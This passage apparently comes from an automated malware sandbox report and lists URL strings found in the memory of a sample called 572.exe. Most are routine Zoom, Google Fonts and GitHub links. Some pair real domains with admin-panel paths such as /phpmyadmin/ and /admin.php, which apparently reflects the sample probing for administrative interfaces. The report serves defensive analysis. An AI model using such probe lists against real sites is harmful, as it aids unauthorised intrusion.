                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/single-session-events/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/video-recording/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/webinars/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/workspace/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/workvivo/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/zoom-phone/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/zoom-rooms/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/products/zoom-rooms/room-connector/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/resource-library/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359011161.0000000047AEA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004027C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/search/
                Source: 572.exe, 00000009.00000003.4304769446.0000000040289000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/support-plans/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/team/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/terms/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/trust/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/trust/legal-compliance/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/virtual-backgrounds/
                Source: 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/zoom-esg/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://explore.zoom.us/en/zoom-ventures/
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fi.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://followerstiktok.xyz/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Lora&amp;family=Poppins:wght
                Source: 572.exe, 00000009.00000003.4402104725.0000000063F8F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E5F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: 572.exe, 00000009.00000003.4359155802.0000000040306000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040305000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3991523314.0000000040415000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                Source: 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                Source: 572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fr.bongacams.com/phpmyadmin
                Source: 572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gcp.api.snapchat.com
                Source: 572.exe, 00000009.00000003.4579113128.0000000005624000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://genshin.mihoyo.com/admin.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://genshin.mihoyo.com/admin.phpp
                Source: 572.exe, 00000009.00000003.4533691780.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://genshin.mihoyo.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.z
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us
                Source: 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/account
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/administrator/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/administrator/~
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download#chrome_ext
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download#client_4meeting
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download#lync_plugin
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download#mobile_app
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download#outlook_plugin
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/download#room_client
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/about/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/acceptable-use-guidelines/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/accessibility
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/accessibility/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/collaboration-tools/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/contact
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/contactsales/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/conversational-intelligence/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/customer/all/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/global-services/
                Source: 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/education/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/finance/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/government/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/healthcare/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/manufacturing/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/industry/retail/
                Source: 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/livedemo/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/media-kit/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/privacy/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/cmk/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/contactcenter/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/contactcenter/features/virtual-agent/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/contactcenter/features/workforce-engagement-management/
                Source: 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/email-calendar/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/event-platform/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/event-solutions/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/group-chat/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/meetings/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/online-whiteboard/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/single-session-events/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/video-recording/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/webinars/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/workspace/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/zoom-phone/
                Source: 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/zoom-rooms/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/products/zoom-rooms/room-connector/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/resource-library/
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/search/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/support-plans/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/team/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/terms/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/trust/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/trust/legal-compliance/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/virtual-backgrounds/
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/en/zoom-esg/
                Source: 572.exe, 00000009.00000003.4390567048.00000000391A6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4401816982.0000000039295000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/error/404
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/events
                Source: 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/join
                Source: 572.exe, 00000009.00000003.4307717822.000000000598E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/signin
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/signup
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitam.zoom.us/test
                Source: 572.exe, 00000009.00000003.3906194985.00000000641A1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.00000000641A1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3906194985.00000000640F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/douglascrockford/JSON-js
                Source: 572.exe, 00000009.00000003.4028547496.0000000047B3A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3908338136.000000006417B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.pardot.com/l/84442/2015-07-14/4xht
                Source: 572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.0000000040716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.pardot.com/l/84442/2015-07-23/mv5y
